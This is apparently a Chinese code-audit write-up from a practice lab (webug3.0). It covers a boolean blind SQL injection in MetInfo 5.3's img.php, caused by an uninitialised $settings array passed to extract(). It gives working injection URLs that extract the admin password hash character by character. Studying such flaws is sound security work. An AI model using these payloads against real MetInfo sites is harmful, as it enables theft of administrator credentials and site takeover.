php代码审计之MetInfo5.3盲注
webug3.0实战扩展第一题是Metinfo img.php的盲注,
<?php # MetInfo Enterprise Content Management System # Copyright (C) MetInfo Co.,Ltd (http://www.metinfo.cn). All rights reserved. require_once \'../include/common.inc.php\'; $mdname = \'img\'; $showname = \'showimg\'; $dbname = $met_img; $dbname_list = $met_img_list; $mdmendy = 1; $imgproduct = \'img\'; $class1re = \'\'; require_once \'../include/global/listmod.php\'; $img_listnow = $modlistnow; $img_list_new = $md_list_new; $img_class_new = $md_class_new; $img_list_com = $md_list_com; $img_class_com = $md_class_com; $img_class = $md_class; $img_list = $md_list; require_once \'../public/php/imghtml.inc.php\'; include template(\'img\'); footer(); # This program is an open source system, commercial use, please consciously to purchase commercial license. # Copyright (C) MetInfo Co., Ltd. (http://www.metinfo.cn). All rights reserved. echo $dbname ?>
我们可以看到可以通过$met_img覆盖$dbname变量
第四行包含了common.inc.php文件,在common.inc.php文件随后的代码里包含了一个config.inc.php的文件, 看名字就知道是一些初始化变量配置,但是config.inc.php的一个数组$settings却忘记了初始化
/*读配置数据*/ $query = "SELECT * FROM $met_config WHERE lang=\'$lang\' or lang=\'metinfo\'"; $result = $db->query($query); while($list_config= $db->fetch_array($result)){ if($metinfoadminok)$list_config[\'value\']=str_replace(\'"\', \'"\', str_replace("\'", \''\',$list_config[\'value\'])); $settings_arr[]=$list_config; if($list_config[\'columnid\']){ $settings[$list_config[\'name\'].\'_\'.$list_config[\'columnid\']]=$list_config[\'value\']; }else{ $settings[$list_config[\'name\']]=$list_config[\'value\']; } if($list_config[\'flashid\']){ $list_config[\'value\']=explode(\'|\',$list_config[\'value\']); $falshval[\'type\']=$list_config[\'value\'][0]; $falshval[\'x\']=$list_config[\'value\'][1]; $falshval[\'y\']=$list_config[\'value\'][2]; $falshval[\'imgtype\']=$list_config[\'value\'][3]; $met_flasharray[$list_config[\'flashid\']]=$falshval; } } @extract($settings);
而且还使用了extract(),容易导致变量覆盖。
即http://localhost/case/?settings[met_img]=met_admin_table or 1=1 --
include/global/listmod.php中,
$query="select * from $met_column where module=\'$search_module\' and (classtype=1 or releclass!=0) and lang=\'$lang\' order by no_order ASC,id ASC";
利用此sql语句,
基于布尔SQL盲注----------构造逻辑判断
http://localhost/case/?settings[met_img]=met_admin_table where substr(left((admin_pass),32),1,1)=char(56)-- 1
-----返回空白
http://localhost/case/?settings[met_img]=met_admin_table where substr(left((admin_pass),32),1,1)=char(55)-- 1
-----返回案例
left(a,b)从左侧截取a的前b位,substr(a,b,c)从b位置开始,截取字符串a的c长度,
很明显,这是对字符进行一个一个的判断,最好是写个python 脚本运行跑出密码,emmm,由于才疏学浅,容我研究一番。